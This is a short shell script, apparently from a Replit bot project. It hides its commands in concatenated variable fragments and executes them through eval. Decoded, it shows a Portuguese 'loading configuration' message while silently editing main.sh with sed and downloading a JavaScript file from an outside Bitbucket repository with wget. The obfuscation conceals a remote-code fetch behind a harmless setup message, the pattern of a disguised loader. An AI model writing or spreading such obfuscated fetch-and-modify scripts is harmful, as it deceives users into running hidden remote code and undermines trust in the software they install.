z="

";Iz='raçã';Qz='leat';wz='bot/';oz='c089';CBz='onto';Zz='/bit';Vz='h';gz='itco';dz='anar';az='buck';Rz='ory-';Yz='ps:/';bz='et.o';ez='row/';Dz=' '\''Ca';Mz='-i "';fz='repl';Tz='" ma';kz='7f8e';Lz='sed ';yz='erv.';GBz='o!'\''';vz='g%20';Ez='rreg';iz='/raw';Uz='in.s';hz='nfig';pz='5bf3';mz='dc57';Xz=' htt';xz='UPRS';qz='6735';nz='5ec9';Pz='ta/a';Bz='r';ABz='js';DBz=' '\''Fi';Jz='o...';Cz='echo';Hz='figu';Gz=' con';tz='6/.c';sz='c9e0';uz='onfi';Az='clea';Fz='ando';EBz='nali';FBz='zada';Wz='wget';jz='/226';Oz='ta/s';Sz='md/g';rz='03aa';Nz='/Pas';BBz=' '\''Pr';cz='rg/f';Kz=''\''';lz='e2a1';

eval "$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$z$Lz$Mz$Nz$Oz$Nz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$z$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$yz$ABz$z$Az$Bz$z$Cz$BBz$CBz$Kz$z$Cz$DBz$EBz$FBz$Gz$Hz$Iz$GBz"